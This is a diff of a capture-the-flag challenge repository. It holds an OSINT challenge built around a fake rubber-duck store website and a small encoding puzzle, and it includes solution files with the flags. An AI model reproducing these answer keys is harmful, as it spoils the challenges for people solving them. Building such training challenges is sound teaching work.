The goal of the (virtual) part of the challenge is to find a certain Twitter account.
This Twitter account `@duck_lover_111` should then contain a tweet with a picture of the location of a QR code.
The PDF document with the QR code that should be placed in this location is provided (`qrcode.pdf`).
Steps you need to take in order to hide the flag:
1. Print the PDF document containing the QR code.
1. Place the document somewhere in an accessible location on the campus. (make sure the location is easy to find for non-VUB students as well.)
1. Take a picture at the location (but don't show the QR code in the image, of course)
1. Tweet the picture with optionally a caption from the `@duck_lover_111` account. You can also geotag the tweet to make it easier to solve. (The main challenge is finding the twitter account.)
## Twitter account credentials
Ask Seppe

16
duck-store/README.md Normal file
View File

@ -0,0 +1,16 @@
# Duck Store
## Text
I've been looking online for some shops that sell rubber ducks.
This shop seems okay, can you check if they're legit?
## Files
None, just the URL of the challenge
## How to deploy
### Virtual part
Run the challenge using the provided docker compose file in `src/`.
### Physical part
A part of this challenge involves scanning a QR Code, placed somewhere on the campus.
To avoid spoilers if you're solving this challenge at a later date, instructions can be found in `PHYSICAL_INSTRUCTIONS.md`.

24
duck-store/SOLUTION.md Normal file
View File

@ -0,0 +1,24 @@
# Difficulty
Medium
# How to solve
The website links to the Twitter account of the shop in multiple locations. (The footer, the about page, ...)
When you visit [this Twitter account](https://twitter.com/TheIGDuckStore) `@TheIGDuckStore`, you need to investigate some of the tweets.
There are two tweets, [first](https://twitter.com/TheIGDuckStore/status/1592953206707195905) and [second](https://twitter.com/TheIGDuckStore/status/1592953377436360705) which are liked by the `@duck_lover_111` account.
The second tweet also has just one reply from this account.
This account contains a tweet with a picture of the physical location of the flag.
A QR Code at this location will contain the flag.
# Hints
## Hint #1
Why do all these brands need to have a social media presence these days? Back in my day, ...
## Hint #2
Maybe doing some background checks on the store's customers can help you.
# Flag
`IGCTF{Secr3t-Of-The-Ducks!}`

BIN
duck-store/qrcode.pdf Normal file

Binary file not shown.

View File

@ -0,0 +1,6 @@
FROM nginx
RUN rm /etc/nginx/nginx.conf /etc/nginx/conf.d/default.conf
COPY ./src/content /usr/share/nginx/html
COPY ./src/conf /etc/nginx

View File

@ -0,0 +1,6 @@
version: '3.9'
services:
duck-store:
build: .
ports:
- 80:80

View File

@ -0,0 +1,26 @@
events {}
http {
server {
listen 80;
listen [::]:80;
server_name localhost;
location ~ ^/(flag|flag.txt)[/]? {
return 302 https://bit.ly/3SxEjGF;
}
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
#error_page 404 /404.html;
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}
}

View File

@ -0,0 +1,106 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>About</title>
<link rel="icon" href="favicon.ico">
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link">Home</a>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link">Ducks</a>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link">Pricing</a>
</li>
<li class="nav-item"><a href="faq.html" class="nav-link">FAQs</a></li>
<li class="nav-item">
<a href="about.html" class="nav-link active" aria-current="page"
>About</a
>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<div class="container py-3">
<main>
<h1>About us</h1>
<p>
Founded in 1981, The Duck Store™ has decades of experience in the
production and distribution of rubber ducks.
</p>
<p>
We offer only the highest quality rubber ducks, using advanced
technologies that extend the lifespan of our ducks.
</p>
<p>
We have received the Rubber Duck Durability Award (RDDA) 75 times, and
we are a member organisation of the Rubber Duck Vendor Association
(RDVA).
</p>
<p>
For more information on new ducks, follow us on Twitter.
</p>
</main>
</div>
<svg xmlns="http://www.w3.org/2000/svg" style="display: none">
<symbol id="twitter" viewBox="0 0 16 16">
<path
d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"
/>
</symbol>
</svg>
<div class="container">
<footer
class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top"
>
<div class="col-md-4 d-flex align-items-center">
<span class="mb-3 mb-md-0 text-muted"
>&copy; 2022 The Duck Store™, Inc</span
>
</div>
<ul class="nav col-md-4 justify-content-end list-unstyled d-flex">
<li class="ms-3">
<a class="text-muted" href="https://twitter.com/theigduckstore"
><svg class="bi" width="24" height="24">
<use xlink:href="#twitter" /></svg
></a>
</li>
</ul>
</footer>
</div>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>

Binary file not shown.

After

Width:  |  Height:  |  Size: 91 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 319 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 192 KiB

View File

@ -0,0 +1,180 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Our Ducks</title>
<link rel="icon" href="favicon.ico">
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™©</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link">Home</a>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link active" aria-current="page"
>Ducks</a
>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link">Pricing</a>
</li>
<li class="nav-item"><a href="faq.html" class="nav-link">FAQs</a></li>
<li class="nav-item">
<a href="about.html" class="nav-link">About</a>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<main>
<section class="py-5 text-center container">
<div class="row py-lg-5">
<div class="col-lg-6 col-md-8 mx-auto">
<h1 class="fw-light">Our ducks</h1>
<p class="lead text-muted">
Discover our range of rubber ducks. We have ducks for winter,
autumn, summer and spring. No matter what time of year, there will
always be a duck that fits right in.
</p>
<p>
<a href="#ducks" class="btn btn-primary my-2"
>Discover our ducks</a
>
</p>
</div>
</div>
</section>
<div class="album py-5 bg-light" id="ducks">
<div class="container">
<div class="row row-cols-1 row-cols-sm-2 row-cols-md-3 g-3">
<div class="col">
<div class="card shadow-sm">
<img class="bd-placeholder-img card-img-top" src="ducks.png" />
<div class="card-body">
<p class="card-text">
No matter what time of year, these timeless ducks can be
used for any ocassion.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€5/duck</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img
class="bd-placeholder-img card-img-top"
src="holiday.png"
/>
<div class="card-body">
<p class="card-text">
Still looking for the perfect holiday gift? Our festive
ducks are now available.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€10/duck</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img
class="bd-placeholder-img card-img-top"
src="newyear.png"
/>
<div class="card-body">
<p class="card-text">
Get ready for 2023 with our new year themed ducks.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€12.95/duck</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img
class="bd-placeholder-img card-img-top"
src="birthday.png"
/>
<div class="card-body">
<p class="card-text">
Someone's birthday? Use our birthday themed ducks to
celebrate.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€9.55/duck</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img class="bd-placeholder-img card-img-top" src="batman.png" />
<div class="card-body">
<p class="card-text">
Explore our line of superhero themed ducks.
</p>
<div
class="d-flex justify-content-between align-items-center"
>
<small class="text-muted">€25.95/duck</small>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</main>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>

Binary file not shown.

After

Width:  |  Height:  |  Size: 628 KiB

View File

@ -0,0 +1,112 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>FAQ</title>
<link rel="icon" href="favicon.ico">
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link">Home</a>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link">Ducks</a>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link">Pricing</a>
</li>
<li class="nav-item">
<a href="faq.html" class="nav-link active" aria-current="page"
>FAQs</a
>
</li>
<li class="nav-item">
<a href="about.html" class="nav-link">About</a>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<div class="container py-3">
<main>
<h1>Are ducks from The Duck Store™ safe to use?</h1>
<p class="fs-5 col-md-8">
Our ducks adhere to the highest safety standards and are tested weekly
for hazardous chemical materials.
</p>
<h1>Are the water resistant ducks available yet?</h1>
<p class="fs-5 col-md-8">
Due to the incredible demand for our new water resistant ducks, we
don't currently have an estimate on when these ducks will be available
for purchase. Please keep an eye on our Twitter for more information.
</p>
<h1>How long do your ducks last?</h1>
<p class="fs-5 col-md-8">
Our ducks have an average lifespan of 10 years.
</p>
<h1>
What is your response to the recent allegations that ducks contain
materials dangerous for humans?
</h1>
<p class="fs-5 col-md-8">No comment.</p>
</main>
</div>
<svg xmlns="http://www.w3.org/2000/svg" style="display: none">
<symbol id="twitter" viewBox="0 0 16 16">
<path
d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"
/>
</symbol>
</svg>
<div class="container">
<footer
class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top"
>
<div class="col-md-4 d-flex align-items-center">
<span class="mb-3 mb-md-0 text-muted"
>&copy; 2022 The Duck Store™, Inc</span
>
</div>
<ul class="nav col-md-4 justify-content-end list-unstyled d-flex">
<li class="ms-3">
<a class="text-muted" href="https://twitter.com/theigduckstore"
><svg class="bi" width="24" height="24">
<use xlink:href="#twitter" /></svg
></a>
</li>
</ul>
</footer>
</div>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.2 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 228 KiB

View File

@ -0,0 +1,257 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>The Duck Store™</title>
<link rel="icon" href="favicon.ico" />
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
<style>
.feature-icon {
width: 4rem;
height: 4rem;
border-radius: 0.75rem;
}
</style>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link active" aria-current="page"
>Home</a
>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link">Ducks</a>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link">Pricing</a>
</li>
<li class="nav-item"><a href="faq.html" class="nav-link">FAQs</a></li>
<li class="nav-item">
<a href="about.html" class="nav-link">About</a>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<div class="px-4 py-5 my-5 text-center">
<img
class="d-block mx-auto mb-4"
src="rubber-duck-large.png"
alt=""
width="72"
/>
<h1 class="display-5 fw-bold">Belgium's largest duck store</h1>
<div class="col-lg-6 mx-auto">
<p class="lead mb-4">
Buy your ducks at The Duck Store™, Belgium's largest duck store. We
only sell the finest rubber ducks, handcrafted by our staff. By using
advanced technologies, we're pushing the boundaries of what a rubber
duck can be.
</p>
<div class="d-grid gap-2 d-sm-flex justify-content-sm-center">
<a href="ducks.html"
><button type="button" class="btn btn-primary btn-lg px-4 gap-3">
Ducks
</button></a
>
<a href="pricing.html"
><button
type="button"
class="btn btn-outline-secondary btn-lg px-4"
>
Pricing
</button></a
>
</div>
</div>
</div>
<div class="container px-4 py-5" id="featured-3">
<div class="row g-4 py-5 row-cols-1 row-cols-lg-3">
<div class="feature col">
<div
class="feature-icon d-inline-flex align-items-center justify-content-center text-bg-primary bg-gradient fs-2 mb-3"
>
<svg class="bi" width="1em" height="1em">
<use xlink:href="#star" />
</svg>
</div>
<h3 class="fs-2">Handcrafted quality</h3>
<p>
Every duck we sell has been handcrafted by a staff member. We take
the time to make sure that every duck has their own name and
backstory.
</p>
<a
href="ducks.html"
class="icon-link d-inline-flex align-items-center"
>
Discover our ducks
<svg class="bi" width="1em" height="1em">
<use xlink:href="#chevron-right" />
</svg>
</a>
</div>
<div class="feature col">
<div
class="feature-icon d-inline-flex align-items-center justify-content-center text-bg-primary bg-gradient fs-2 mb-3"
>
<svg class="bi" width="1em" height="1em">
<use xlink:href="#time" />
</svg>
</div>
<h3 class="fs-2">Durable</h3>
<p>
Our rubber ducks have been awarded the Rubber Duck Durability Award
(RDDA) by the Rubber Duck Vendor Association (RDVA). Using
groundbreaking technologies, we're making sure that our ducks last
even longer.
</p>
<a
href="about.html"
class="icon-link d-inline-flex align-items-center"
>
About us
<svg class="bi" width="1em" height="1em">
<use xlink:href="#chevron-right" />
</svg>
</a>
</div>
<div class="feature col">
<div
class="feature-icon d-inline-flex align-items-center justify-content-center text-bg-primary bg-gradient fs-2 mb-3"
>
<svg class="bi" width="1em" height="1em">
<use xlink:href="#money" />
</svg>
</div>
<h3 class="fs-2">Fair pricing</h3>
<p>
Ducks should be available for everyone, that's why we offer
competitive pricing and bulk discounts. You can get a duck for as
low as €5! But if you buy 1000 ducks, you can enjoy a 10% discount!
</p>
<a
href="pricing.html"
class="icon-link d-inline-flex align-items-center"
>
Pricing
<svg class="bi" width="1em" height="1em">
<use xlink:href="#chevron-right" />
</svg>
</a>
</div>
</div>
</div>
<div class="container marketing">
<hr class="featurette-divider" />
<div class="row featurette">
<div class="col-md-7">
<h2 class="featurette-heading fw-normal lh-1">
Introducing our first water resistant ducks.<br /><span
class="text-muted"
>Now that's innovation.</span
>
</h2>
<p class="lead">
We're exicted to introduce our newest line of water resistant rubber
ducks. After decades of extensive research and development, our
first line of water resistant ducks are now available. The same
ducks you know and love, but now ready to endure even the harshest
environmental conditions.
</p>
</div>
<div class="col-md-5">
<img
src="big-duck.png"
class="bd-placeholder-img bd-placeholder-img-lg featurette-image img-fluid mx-auto"
width="500"
/>
</div>
</div>
</div>
<svg xmlns="http://www.w3.org/2000/svg" style="display: none">
<symbol id="twitter" viewBox="0 0 16 16">
<path
d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"
/>
</symbol>
<symbol id="star" viewBox="0 0 16 16">
<path
d="M3.612 15.443c-.386.198-.824-.149-.746-.592l.83-4.73L.173 6.765c-.329-.314-.158-.888.283-.95l4.898-.696L7.538.792c.197-.39.73-.39.927 0l2.184 4.327 4.898.696c.441.062.612.636.282.95l-3.522 3.356.83 4.73c.078.443-.36.79-.746.592L8 13.187l-4.389 2.256z"
fill="#ffffff"
/>
</symbol>
<symbol id="time" viewBox="0 0 16 16">
<path
d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zM8 3.5a.5.5 0 0 0-1 0V9a.5.5 0 0 0 .252.434l3.5 2a.5.5 0 0 0 .496-.868L8 8.71V3.5z"
fill="#ffffff"
/>
</symbol>
<symbol id="money" viewBox="0 0 16 16">
<path d="M8 10a2 2 0 1 0 0-4 2 2 0 0 0 0 4z" fill="#ffffff" />
<path
d="M0 4a1 1 0 0 1 1-1h14a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H1a1 1 0 0 1-1-1V4zm3 0a2 2 0 0 1-2 2v4a2 2 0 0 1 2 2h10a2 2 0 0 1 2-2V6a2 2 0 0 1-2-2H3z"
fill="#ffffff"
/>
</symbol>
<symbol id="chevron-right" viewBox="0 0 16 16">
<path
fill-rule="evenodd"
d="M4.646 1.646a.5.5 0 0 1 .708 0l6 6a.5.5 0 0 1 0 .708l-6 6a.5.5 0 0 1-.708-.708L10.293 8 4.646 2.354a.5.5 0 0 1 0-.708z"
/>
</symbol>
</svg>
<div class="container">
<footer
class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top"
>
<div class="col-md-4 d-flex align-items-center">
<span class="mb-3 mb-md-0 text-muted"
>&copy; 2022 The Duck Store™, Inc</span
>
</div>
<ul class="nav col-md-4 justify-content-end list-unstyled d-flex">
<li class="ms-3">
<a class="text-muted" href="https://twitter.com/theigduckstore"
><svg class="bi" width="24" height="24">
<use xlink:href="#twitter" /></svg
></a>
</li>
</ul>
</footer>
</div>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>

Binary file not shown.

After

Width:  |  Height:  |  Size: 225 KiB

View File

@ -0,0 +1,267 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Pricing</title>
<link rel="icon" href="favicon.ico">
<link
href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css"
rel="stylesheet"
integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi"
crossorigin="anonymous"
/>
</head>
<body>
<div class="container">
<header
class="d-flex flex-wrap justify-content-center py-3 mb-4 border-bottom"
>
<a
href="/"
class="d-flex align-items-center mb-3 mb-md-0 me-md-auto text-dark text-decoration-none"
>
<img src="rubber-duck.png" class="bi me-2" width="40" />
<span class="fs-4">The Duck Store™</span>
</a>
<ul class="nav nav-pills">
<li class="nav-item">
<a href="index.html" class="nav-link">Home</a>
</li>
<li class="nav-item">
<a href="ducks.html" class="nav-link">Ducks</a>
</li>
<li class="nav-item">
<a href="pricing.html" class="nav-link active" aria-current="page"
>Pricing</a
>
</li>
<li class="nav-item"><a href="faq.html" class="nav-link">FAQs</a></li>
<li class="nav-item">
<a href="about.html" class="nav-link">About</a>
</li>
</ul>
</header>
</div>
<div class="b-example-divider"></div>
<div class="container py-3">
<div class="pricing-header p-3 pb-md-4 mx-auto text-center">
<h1 class="display-4 fw-normal">Pricing</h1>
<p class="fs-5 text-muted">
Can't get enough of our ducks? Subscribe to get a weekly, monthly or
yearly duck.
</p>
</div>
<main>
<div class="row row-cols-1 row-cols-md-3 mb-3 text-center">
<div class="col">
<div class="card mb-4 rounded-3 shadow-sm">
<div class="card-header py-3">
<h4 class="my-0 fw-normal">Yearly</h4>
</div>
<div class="card-body">
<h1 class="card-title pricing-card-title">
€1<small class="text-muted fw-light">/mo</small>
</h1>
<ul class="list-unstyled mt-3 mb-4">
<li>1 random duck/year</li>
<li>Standard shipping</li>
<li>Email support</li>
<li>Help center access</li>
</ul>
</div>
</div>
</div>
<div class="col">
<div class="card mb-4 rounded-3 shadow-sm">
<div class="card-header py-3">
<h4 class="my-0 fw-normal">Monthly</h4>
</div>
<div class="card-body">
<h1 class="card-title pricing-card-title">
€15<small class="text-muted fw-light">/mo</small>
</h1>
<ul class="list-unstyled mt-3 mb-4">
<li>1 random duck/month</li>
<li>Priority shipping</li>
<li>Priority email support</li>
<li>Help center access</li>
</ul>
</div>
</div>
</div>
<div class="col">
<div class="card mb-4 rounded-3 shadow-sm border-primary">
<div class="card-header py-3 text-bg-primary border-primary">
<h4 class="my-0 fw-normal">Weekly</h4>
</div>
<div class="card-body">
<h1 class="card-title pricing-card-title">
€50<small class="text-muted fw-light">/mo</small>
</h1>
<ul class="list-unstyled mt-3 mb-4">
<li>1 random duck/week</li>
<li>Express shipping</li>
<li>Phone and email support</li>
<li>Help center access</li>
</ul>
</div>
</div>
</div>
</div>
<h2 class="display-6 text-center mb-4">Compare plans</h2>
<div class="table-responsive">
<table class="table text-center">
<thead>
<tr>
<th style="width: 34%"></th>
<th style="width: 22%">Yearly</th>
<th style="width: 22%">Monthly</th>
<th style="width: 22%">Weekly</th>
</tr>
</thead>
<tbody>
<tr>
<th scope="row" class="text-start">Normal ducks</th>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
<tr>
<th scope="row" class="text-start">Special ducks</th>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
</tbody>
<tbody>
<tr>
<th scope="row" class="text-start">Custom ducks</th>
<td></td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
<tr>
<th scope="row" class="text-start">Birthday ducks</th>
<td></td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
<tr>
<th scope="row" class="text-start">Swap for different duck</th>
<td></td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
<tr>
<th scope="row" class="text-start">1 week warranty</th>
<td></td>
<td></td>
<td>
<svg class="bi" width="24" height="24">
<use xlink:href="#check" />
</svg>
</td>
</tr>
</tbody>
</table>
</div>
</main>
</div>
<svg xmlns="http://www.w3.org/2000/svg" style="display: none">
<symbol id="twitter" viewBox="0 0 16 16">
<path
d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"
/>
</symbol>
<symbol id="check" viewBox="0 0 16 16">
<path
d="M13.854 3.646a.5.5 0 0 1 0 .708l-7 7a.5.5 0 0 1-.708 0l-3.5-3.5a.5.5 0 1 1 .708-.708L6.5 10.293l6.646-6.647a.5.5 0 0 1 .708 0z"
/>
</symbol>
</svg>
<div class="container">
<footer
class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top"
>
<div class="col-md-4 d-flex align-items-center">
<span class="mb-3 mb-md-0 text-muted"
>&copy; 2022 The Duck Store™, Inc</span
>
</div>
<ul class="nav col-md-4 justify-content-end list-unstyled d-flex">
<li class="ms-3">
<a class="text-muted" href="https://twitter.com/theigduckstore"
><svg class="bi" width="24" height="24">
<use xlink:href="#twitter" /></svg
></a>
</li>
</ul>
</footer>
</div>
<script
src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3"
crossorigin="anonymous"
></script>
</body>
</html>

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 763 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 157 KiB

View File

@ -0,0 +1,3 @@
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-star-fill" viewBox="0 0 16 16">
<path d="M3.612 15.443c-.386.198-.824-.149-.746-.592l.83-4.73L.173 6.765c-.329-.314-.158-.888.283-.95l4.898-.696L7.538.792c.197-.39.73-.39.927 0l2.184 4.327 4.898.696c.441.062.612.636.282.95l-3.522 3.356.83 4.73c.078.443-.36.79-.746.592L8 13.187l-4.389 2.256z"/>
</svg>

After

Width:  |  Height:  |  Size: 399 B

View File

@ -0,0 +1,17 @@
# Full stack encryption
# Text
Hi there! I'm a full stack encrypter, I encrypt stuff for a living.
I recently encrypter my password using my custom framework, but I forgot it and now I'm trying to get it back.
Can you help me out?
NTYgNTQgNTAgNDcgNTMgN2IgNTIgNjEgNGIgNjUgNmMgNDMgNjcgMzMgNTEgN2Q=
Flag Format: IGCTF{...}
Author: Thomas (Dienst CTF)
# Files
None
# How to deploy
N/a

View File

@ -0,0 +1,9 @@
# points
medium 40
# How to solve
Users have to first decode from BASE 64, then decode from HEX and then apply the ROT 13 algorithm.
# Flag
IGCTF{EnXryPt3D}

View File

@ -0,0 +1,12 @@
# Hacking the Cybernukes - Part 1
## Text
